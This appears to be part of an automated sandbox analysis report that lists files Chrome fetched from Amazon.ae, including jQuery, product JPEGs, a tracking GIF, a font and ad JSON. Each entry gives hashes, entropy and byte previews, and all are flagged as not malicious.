                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                                                                                      MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                                                                                      SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                                                                                      SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                                                                                      SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x296, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23722
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961503943794365
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:31mUU3l0CBp6Vz9bGHesa8ITwv5jnK0UOQrPs0632TZnCEvGd9WuET6dafIBEDdT:31qPpYbYemI2BVUOgx1TZnCEvTFucBZT
                                                                                                                                                                                                                                                                      MD5:ECD1E0A70050A43E734D1C961604C82B
                                                                                                                                                                                                                                                                      SHA1:9FAEDE925A1E5A9070D5664FA514300BD8985D20
                                                                                                                                                                                                                                                                      SHA-256:761496BDE0DE10F16BAD65034645AF648E51F4B9F3B4CDDEFE7286E584F1A91E
                                                                                                                                                                                                                                                                      SHA-512:0EE92356702D3EAE827CEA5B912F9AFC0731F5288E66C8D649990C118530C671FBBB70CBF30348319BDBFDFA3375AFB935636B97083F425669264C382085A77F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......(.@.."..........6...................................................................`............6.I..KmV.z..)g.6.d...(....q...M..............cU.J..(......@.G.t..X{W7.78...G^c...Ja}YmL.=...O{.Z!..+Wr....._>....[.......A.......g.}5..I.#n..d.?j-k.a..}........!"..:B...sd.s..S...~.....X,3.wJ.T..jxw.>.z[|>.o....*..O..}.i...x.[..2...3.^..O......o.....X(......|P.....[$N.c.y.....-.m.$.f..*.r...V.}..0........+'.M....".k.mjsY,.!.,Ob4.._.,..<.2X.._($VS.#.p..",.1ja..V\...vgu.X./3.....:.?.D....Q.iH.......}...w.......}p...f.S.x!*g.;Gm...Y..6....W-....o..='.e.r.ZV..b...l._N.55.....(.......T....K.f..r.`Y.....5y./...g<`..5Ybl.....b]..(..._......*mYb....M.;..[..l..-..X[....L..U.z.=..U.l..+..v...z6.....c.I..gkx..o*.;........o..@....n.....Y.q...#.o.ni\.....9S.F....D...^Z..s..3.e.^p.{.....u.r..Y.,.eA.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 93x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3083
                                                                                                                                                                                                                                                                      Entropy (8bit):7.862469598291982
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TwSCRWORiH2Nq5sMI6m80si6BIDisuuVifq5:kSoiH2E57I9rsdBIDisuuViy5
                                                                                                                                                                                                                                                                      MD5:B088AB81A9867340193907B5FDBA0E5D
                                                                                                                                                                                                                                                                      SHA1:E8E3567EBA659EC5EB5EE86300EC5117E2A3B174
                                                                                                                                                                                                                                                                      SHA-256:CC25AF31A9B84BE67A58C76EF2F95BDAF7DE474E851DEFFD6483FC9A790B4257
                                                                                                                                                                                                                                                                      SHA-512:20EAF5CA4DFDD76C1C532CD8E76816A40E927D829D3FDD86088F62B91E1B61C6E7186C90F79222B41DFF3BF97CFFA1D3D7405FA0308C64E70494AF870921DB56
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71mL0rwKWNL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.].."..............................................................!1..4Aq.."Qt......2CRas.3Bbcr......#..$S........................................................?...d.2d.p.....N."<.N....Z......_.n....'.V...8E.Y.Q#X.ZV7aik?M...Ox6.(.LV.3.Y.Cs.7.RW.Wp_@....4....Q.<%.I..Neg.V...{.....c3|s.8..........."p..;'C...,CD.6i.'.b?...........V:..O....x.7.. .9..k..%.*..P.,.4...[N..F.F...S*^i..2....2.d.?.....n........I.Q....%A8.7.Jc..6.[.<...........3..0.[j.....D_......_....5......V.....c0..ly...o..N_..&.g.n*H...^&.....z.p.'bEx.=X....e`.....d`C...u*..b..;.X[5ju......!.......-_*no.2.P]...a...a..~r...^..a.{$....@ ........7.i.Uw.$u. .#.q...$.....t..y.....U~FH..F.C.}.R..cf.kr}l3..+....8..7.f...GB..6v@ .Q.U.A...9#...u.d.Q..nV.:uk..:r...l....tA...>........~...Y....?.DhX.*N6,.q....Wlmq......:.+...6......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):34220
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969744350320113
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1jQCul0a4QwMo9HZARjOPkA8I3x0qRWiGhsXW3A9wJj6zP28b4:RQCa0aeHTAQ8A8I32tfJsb4
                                                                                                                                                                                                                                                                      MD5:0ACB01DE0D59D0B7945D9B8504B1D140
                                                                                                                                                                                                                                                                      SHA1:DEEA6333C21C34B29ADABED868C7FE5E81EA5831
                                                                                                                                                                                                                                                                      SHA-256:CE3579433FA0B028890B9458D385B5A607CFF9B7618918F2A3C6E55C21036614
                                                                                                                                                                                                                                                                      SHA-512:9E5A32226F82E4861C611FD989803594C5CA54885085E7AC48B4155E05B4A6797AC4AB330FA5399ABCCEF2C726509D6AA6BEEA5E19FC1981498C6F20FF334790
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................En.e6L....S-.M....j.+J.6....]m;V...DC.$.K...D....ul...:.1.P........Ud.j.)b.*v.k.aY..M.....YZ..)aP"Y.*.f+..b....tek...&.j.P..;=o.u.0t.h..f..T!....b..WJ....zo......O..f...{}......V...[.B.u..].....x.o..c...v.rj,...T...6}z.$."k.......wx.'..+{{.H....a...V..+U/..*.1+O...m...y...e..u....~..-....$....}HEst...`.._.oj|M...r.^g......{B.T...+H...Q.F./d.9=|....t..[...7.6S....)j.EO[-V.vI.I...U&.....}....W....o.L......".s#..S.lU.Xh..~N...B[W.._..W.<'..7e.aa&..j4.fy..?U.fbg.W......|..}....~S.l[.u.+.j...b..U9..X..n.?.xnnJ.a.....s|...W.<.7i..\..E.1....f'.O#..H...Wr.ox..9.Z...y...t.w.$.e+...........N.q......O7......_.N.......,.....!A'a.+'....W......mI.^N.e..y.ir....w.6.4...}K.gY+!.G....'..<>..8y>o.:>....{./+....gPG.t}2H..[....^......._B.........+$0.C...7.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.857076115319748
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:4J33UHXxeaa5qmMvoQ7oQUUXN+xEKAkbdEItdx8n8MZNKQaxjnWBek5ua0CpZGD:iIkaa07tnXNIAkbyU88MZ4sAaubC3q
                                                                                                                                                                                                                                                                      MD5:85B40FA7430C7C8B73F2698B3E7975B1
                                                                                                                                                                                                                                                                      SHA1:0D2AEC6E4434A9B29ABA0704DEF82990A2ACCD85
                                                                                                                                                                                                                                                                      SHA-256:EF1AE84821A24B0D1DD882B70121E278BBEBA7E8017B05B69C6EA21AF83F0B31
                                                                                                                                                                                                                                                                      SHA-512:176C81985059D6404E926986B840B6BEEE4D89B90ECCDCE6E7D4C43BD383F1B59E3245C0377D5654F0DB0157054FD3EE6E2630F2B455624C925FC6192E803104
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE._SY116_CB566996700_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........4...................................................................<.\...f.+...C..7-D..P...G+m..j..,..w...S.}......\.].*..D.4sM..;a.|...j..F.W.L.@ ../bt.G.4B..s%"A..F)...\ hV"...../.....U...2..u..y.g Q....Z.2..[..Z..*.y=..$..._.....?..k.G...A...T...8..".h..p4K.@AP!dtR6..1......^O.."F....2..H.O0_...p..p4K.......4..;.....2.?.UO....Y.&.O_mS......p..`."....q{.:.m+.*8.["a.U...S].jU4dw...........%...Wa..,V..*\.Wn...x."r.XaB.6.(......?.........................!1..AQ...."02Ta. #Rq..$34BSs..&c.r..........?...:...M..!..rX.W.9..?...s.,~3_H..H.f..M...zv_.O..N.....zvo...k.|<~#^............e.x.F.>.>./..N.....zr_.O.....7.7.o.......WZ...H.$..=......y..^.(!}/V..L..v1..*=6...".dg.f.....ugn.v.V.J.$.....2...Ocd.n........;...!.Wze.P.<.J.i*.(.(.w..+D..H.......M..n.n.Z......."w.QxXL...b0.%....."#E1.+v...{
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):3.2226627197680635
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUzRtwv+L1pse:1/se
                                                                                                                                                                                                                                                                      MD5:F837AA60B6FE83458F790DB60D529FC9
                                                                                                                                                                                                                                                                      SHA1:14AF87CCEC7F81BB28D53C84DA2FD5A9D5925CDA
                                                                                                                                                                                                                                                                      SHA-256:DCECAB1355B5C2B9ECEF281322BF265AC5840B4688748586E9632B473A5FE56B
                                                                                                                                                                                                                                                                      SHA-512:A85E09C3B5DBB560F4E03BA880047DBC8B4999A64C1F54FBFBCA17EE0BCBED3BC6708D699190B56668E464A59358D6B534C3963A1329BA01DB21075EF5BEDACE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x307, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30807
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981130497181998
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:E8Wsecjcpj7R401m7Nb/SIZlMmcuF75ni4E7a:ycjS/R4kUToY7ViTu
                                                                                                                                                                                                                                                                      MD5:2592C6F34955797711AC14DFB2754063
                                                                                                                                                                                                                                                                      SHA1:5147BD85B9535EBA94EAB8F6F0ECC21BD0362182
                                                                                                                                                                                                                                                                      SHA-256:03F92EF1583A8E25635353B2FF6B46DD1123525C2B91060999C51712356A3B5B
                                                                                                                                                                                                                                                                      SHA-512:2FE75FC665E917EE3D9FF7821A7625E3AA55E66FB23DBF4B1086BC0DC55EC0C814DE27F4F1201962F1E9FF25B02F77BD6BE6E218FA441421E4924D6DFBF56CDE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/818P7sdeAGL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......3.@.."..........6...................................................................t....ts..Q..."JmB$.."JmB$.."Jo.1.......!Q.....3........cf.P..Q6..Sj.%6..Sj.%6..S}G.m.C..f...0...:.).x.1.F..2v.f...l..8.s._.?..z.......l..O....b&....Z;.jI....VnIi...ZG.q..*.>EP..b...=X.U....e..&......!..z.....ar..%<.J^.n...8...-...X..5.c..R\.r.Y...e.yIh.95...VY.SY.Mc...d..Iy../......h.f....aB....U.\?N!..iM......FX....2h.y.....@....=\.o............X9......^.J.Ov...t..-.#..x...o..n....3.....L.D|~x.-.....>.H@...~(......o.!).o...,y...W6..S.9.,_.D.........cLb.6+g<.8~..6{..3.I.>.X...%6I$...$.K..9...Lg.A...L].....&!....~.:.n....rG.../.y..%..4E...(..Z._.c...%N.........,..'.Y....K6}.._..u.au.$.I$.G.g3i...K>.<.d>........n..>.....g..F.VEKd'..o........i....9.M&....fB..?.<K.Y.|.R....\.w....%.._~9j....#M1...wT'.tVr8......fc..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4718
                                                                                                                                                                                                                                                                      Entropy (8bit):7.922320061464419
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:74UCfhAULTKIf71mRaK2JUIc1GLXyogum/K6tYMTQPF+anj1I:ofBvfFK2JF5jyvuP6LKYcO
                                                                                                                                                                                                                                                                      MD5:69D81F4881A1CFBAC6936C842D39A7C4
                                                                                                                                                                                                                                                                      SHA1:709BBEA49FCD3B7F9E4A2EC026F5F4A85E28C6F7
                                                                                                                                                                                                                                                                      SHA-256:8D4CEDCA0F7354B44DA3FB9F25723B3B43C37E7495DD60AD0F5FA0F755FD793C
                                                                                                                                                                                                                                                                      SHA-512:090E09E9240A03DE7ECEDBFD79A637D0C99523596EA1C5884C42A9A7B21BD8E3A17153B41715DB3D31FA72BE4AA585B37F02023A56BB2FF610C1C79817A8D8CA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."..............................................................!..1..AQ.."a...#Tq...2b...$3BCRSr...5Dt......................................................1.!A."2Q..Baq......3CR..............?...QE^/;Hi..i.W..WZ...'...=....!.."...%s_;.v...G.C..Q.?.?.j...U....d..\......,..X..qr..[.\..*|mI..q.T..|....8g\..L..h....3.8=Em...i....o..i.aC.NR..9.....id..C.!..B.$.h^..J,...3....3v.4...A.._,q....~U..-...;O.4....iT...G.r..8.....7.c..%..8.HNS.s/....x.hfg.!.F.......$..;..d3IIpI..-7..~.} I.q..H/.q.....E...._.XK.l..R.B..<..<k...2...X...\K.v*A.@..=.R.1..Ym4...5..).vc.....i.. ...7...g_...~...:.g.[..m4..&k{X.j...'z.B"..j...Z.\Zhv....D.O2..-..G_.....U`..O......p..X..0..2.{.(<..........)>.>3.=.I.q.x.g....Il..gc*..._..FZ....2-CD......G B.$ ....H...6g.U.<{6.=..Wf.2.P.0^............h.o.a...Hr}.~3....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 310x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14661
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957173631524594
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:MMRh4/t2Zc6TXJa0fsWvaOtNIPZGOFDW9VpJB+pj2Fumq5jtbqWkj0NzlE0F:NM2L5ZsW3EPZGOFDWlb6j2Fxq90uC0F
                                                                                                                                                                                                                                                                      MD5:C13E7E0F83844FACAE659C879C9B556E
                                                                                                                                                                                                                                                                      SHA1:CC8366CAD1B30849CCCE4B6EAFB12C7B392280AC
                                                                                                                                                                                                                                                                      SHA-256:43BCE861B1BCD53AD3C26FABEA35CAB62E5179CB471DB7038506C714146E1888
                                                                                                                                                                                                                                                                      SHA-512:30291F160772D66F87E999550A6D7FCF895FE0D3A67CF4B4AB00E38444A72CE5A7E005F129FBF0EA1827A2424DF7E55EC8476B06DFA2BF004CCDE0CD96B02156
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.6.."..........4.................................................................X.......F...i.L.^:G\..-Z....\..Y.f.).r]..]..n.P.....v}...Gt....^W..Ukl......!.l.U. .>..R3;z|....bdDcL.C....#...k..l.G.a..{.L.a7U.Z..<..o....o.u....4...v.K..c!..`BT`..C.a.l...6........B.L .6ape...>...]....j...G..)......i.u.O...a....v.H.i....f.....9..0....5mk:|....F$.. ..=.l..+.......z.m.DJ.j.+...??..z.)....@......|...........r.....{.<..fT[._..1.>VC.f...Ms..G....Y..-J8....( $.......u.Q.m..D1.uns.9.gw....,..[.i..3.qN.......}v.Fdfuy2."+)!.YDF.e..REBJE&..+Q(...H.5...#xk.%...rn.....q............~.u6l....z....J.w....2+:..d6.,....5.C.D1..I5..ZK"$.Q..M..b.s..&..u.G.9..`.a....k^!q......z.?.......6.FN.*Cc$.JFj$..Md$tD..LgH.-.....c9.3...A...I[g....^........;..^.....tM...5.Z.#Zt.c.M^..W.2c#Z.91$.2bQ.......9......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 16460, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16460
                                                                                                                                                                                                                                                                      Entropy (8bit):7.987708256804987
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:pvO6xEw4Jj9HYfGbtieHqP0l4S7NVXfU3xqJvzJmPnC1LiTNNIb0QAZtcnlclz0n:bWzHqP7S7Na3SJmKNyElcUuMXqGN3v
                                                                                                                                                                                                                                                                      MD5:15E17F26C664EE0518F82972282E6FF3
                                                                                                                                                                                                                                                                      SHA1:46B91BDA68161C14E554A779643EF4957431987B
                                                                                                                                                                                                                                                                      SHA-256:4065B43BA3DB8DA5390BA0708555889F78E86483FE0226EF79EA22D07C306B89
                                                                                                                                                                                                                                                                      SHA-512:54EADB53589C5386A724C8EEA2603481EBB23E7062FD7BFAB0EAFE55C9E1344F96320259412FB0DC7A6F5B6E09B32F6907F9AAA66BCA5812D45157E3771C902F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIFont-amazonember_bd-46b91bda68161c14e554a779643ef4957431987b._V2_.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......@L..........?.........................?FFTM..8..j..@.`..~.....h..i.6.$..F..<.. .....a?webf..}...6..........n.......fE.q. ..Y...9.2d.$.}[..0.H....j.k....U..#"-SM.t..."D....+....t.8f...s...g636|..g._.....EB.T.!.B..!..y...k....Ya..G~.Y.;+....)...k...=it.........k_.^.z.#.).).....Y?....}..&N.s....1..=A.FXSG...`C...00..5*l..#6...w....-...hkJ. .-...$D..1j..F.]..ny^..]..:.\...2......^n...5P......_.6..k..2..K..i......y....K...?..6...*q>.. .....a9...........4/.c.E.........q...8N..$.$....z.?.d..v.QmY..D....s...:Y...S.|..|...[..@...4...V..n..s....t....A....\.v..X...M..O4.!=$..35m1\..wT"..w.c.s(...]t.?....."Q....1(.p..%0<-v..b.^R.)E:$..0<.....R.B.TY...K..n\..{#...kd.-.8..#.........t;..3.....IT[..2.L...........H..$..._.j.....b<B..uN.,*....k....@.k.k.....[.........6....U.1bDDD..Qu....R..+a......^.iS..qb.^..U.uU.sj..-<D....H..Y.J..[......8....V}........}.$^...CE..jc. d`.^..q..Nw.....`...1...S19.u....`H..WT.1.....y...c.A..op`..V..I....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.1115229675355165
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNUzrqJcrr+09EbtGeSDOwjday0uqYb40STfKAHSTfXAh4uQpU:Iszrgc+09Ej+lj4yA84fKAAXAh4uQpU
                                                                                                                                                                                                                                                                      MD5:7604041C247FDB9FC5EB94566B007065
                                                                                                                                                                                                                                                                      SHA1:6C673B893B1964052D3DA2B598004A4FF1E698A3
                                                                                                                                                                                                                                                                      SHA-256:CA701F2A62B388D68F09702B9C3BBF4CAF943950A599FC7B2756AA71887F1687
                                                                                                                                                                                                                                                                      SHA-512:9190AB502E005AF198801C7BF2E82CA33A72A2013304A19F6CBDE53AC6BF76066604FBDD207011EF2F6E91074DA1B740E60EDDD0087149F54B530649F519E731
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-7&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px; display: inline-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2354
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7983762557864855
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r8ugddGbnVg5drcspO38av1A43N+klwuwmpCVBo:Tj1rcspOMb433P1iBo
                                                                                                                                                                                                                                                                      MD5:8E65C5BF438DA029BEED5759985ED82F
                                                                                                                                                                                                                                                                      SHA1:47C01210115A756F85B952564D2AF49FC170DB10
                                                                                                                                                                                                                                                                      SHA-256:39495131401B71CA51F5B4D4A1746037A0652EC179D51E0D228933D0AE8145B7
                                                                                                                                                                                                                                                                      SHA-512:B93002AD79E156246AF9A91F6829B55062BD786A08C47D47F031C65EB717370082B131BC65620A94ED4C79AA206961F312B69D2DE92A4D4E6CA401DE069493E0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1AQ..Ua...."235BRTq........#Crt....$%b....................................................!12Q"...3Aa............?.........DD....D@...DD....D@...D^..$.......q..ZR.ed2..=...6....$.w......Eu..YH....I.f.T..qJ>f..T-g.K.[.....9..H....}........k..}......>.{$tQ..R.?W7.o.V...tC7...9mOC..d..'...?yM).\.S..?.w...S..z...bE.M.....yf?.u.3_.Q.<3F.$.f?K.&..@G......!../.e." .eC\._.j.5......u..._..8423..........._?]'.9d...AL."o...d.3...3.9.L.I.T.6.J.>.I..C#.E.......PW]F......b/...].[V.....l.lT.6..9V..S...j..5f.+n).....Os.e.PS$`.........e.L..../~i...Al....:q.u...^.1K1.&?..}e.....G/3.lA.2.$..vo''...SPW '...vU.h.N..K...A..I0.5N...../1E#..%.A8.P..$..N.M.e......-.f...F...\^....S.....<...`..L_.,.F75.g.G...R.$L.&{.h..#w2.g.=..?......$...#.s...z....qk)d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):68782
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976825743641747
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:rIZGY8i4nqkvDYubQwqNAUnF5CQLPqIPl9IAXkK4zwxZ62Y:rhuoXbYcdc3FbjqIt9F4zwj6F
                                                                                                                                                                                                                                                                      MD5:D4F855A97CE69E0B4359AB927EC28574
                                                                                                                                                                                                                                                                      SHA1:6FE0487FA6ADBCAEDF60DBFB8086C001C0292307
                                                                                                                                                                                                                                                                      SHA-256:19B9598112754CE0A2612686ABC08BA18981C528FC3189C6AAAB4087ADB855E6
                                                                                                                                                                                                                                                                      SHA-512:9E9775C21FBBD3F119569B94416DB3809CE68FB39726A514FE87560F7034EBECFE7019DBA6E920DAB8602F1022E65D77CD6F7B7570C62E5FA846A45E27FECA75
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;.................................................................................`..0...@.YoQ......q....|~./?.Z.~u.....d..w\................<9a...c.^..69....d.........Fj..(u.a...............o....vEhc.zN.........v.....LK.'.\i@...........m...@.!.............X.L...JYi.._.........k...y.+1............/.mw<}&.}.`c ......G...w...............9K.....)..7......."......H....@..........~..2'.p...<.........-.a.......5.....V.......|..;....c.W=.....e7#....4.....@.."..........3'u'...!..D..%6..........b.(.0'Tv....;E...<...~.....n......|...~.t..;.........&...9..64..1oqm%.............O.M"d...t.....L..<...}....d.......h.=.*..<...>....$..c~...+....{~#......=...8N.R......K...........!u..._!.~.x.......#&.0...O.q....j......<.?.]...^.....a........l..1.w...Kj./.L..WO).... <..............f>..oowX......".O...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
